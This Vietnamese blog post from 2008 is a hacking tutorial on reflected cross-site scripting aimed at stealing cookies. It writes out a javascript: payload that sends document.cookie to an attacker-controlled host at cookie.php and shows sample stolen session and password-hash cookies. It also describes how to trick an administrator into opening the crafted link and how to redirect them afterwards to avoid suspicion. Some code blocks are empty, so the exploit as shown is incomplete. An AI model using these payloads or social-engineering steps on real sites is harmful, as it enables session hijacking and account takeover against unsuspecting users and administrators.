Thứ Sáu, 18 tháng 1, 2008

XSS hacking

*** Dấu hiệu nhận biết site mắc lỗi :
Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này
Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]
Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao

*** Cách chèn script :
Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã
Bây giờ bạn vào 1 forum đi, vd ibf đi nhá (BKIT là VBB nên sẽ có dạng section khác IBF)
Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá
Code:

javascript:alert(document.cookie)



Thấy gì nào ? Nó sẽ ra có dạng thế này
Code:
acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026

[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie
Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong
Code:
javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)

Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất.
Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit.

*** Cách exploit :
Đầu tiên tạo file cookie.php thế này up lên host của bạn

Code:





XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

Code:

http://sitexss.com/index.php?act=[xss]



Chúng ta khai thác thế này

Code:

http://sitexss.com/index.php?act=



Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn
Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )

*** Vài lưu ý :
Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :
1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS 10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )
2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn
3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade nó lên location

THE END ---- COPYRIGHT BY HCVTEAM.NET ---- YIM : thanh.1989

0 Nhận xét:

Đăng nhận xét

Đăng ký Đăng Nhận xét [Atom]

<< Trang chủ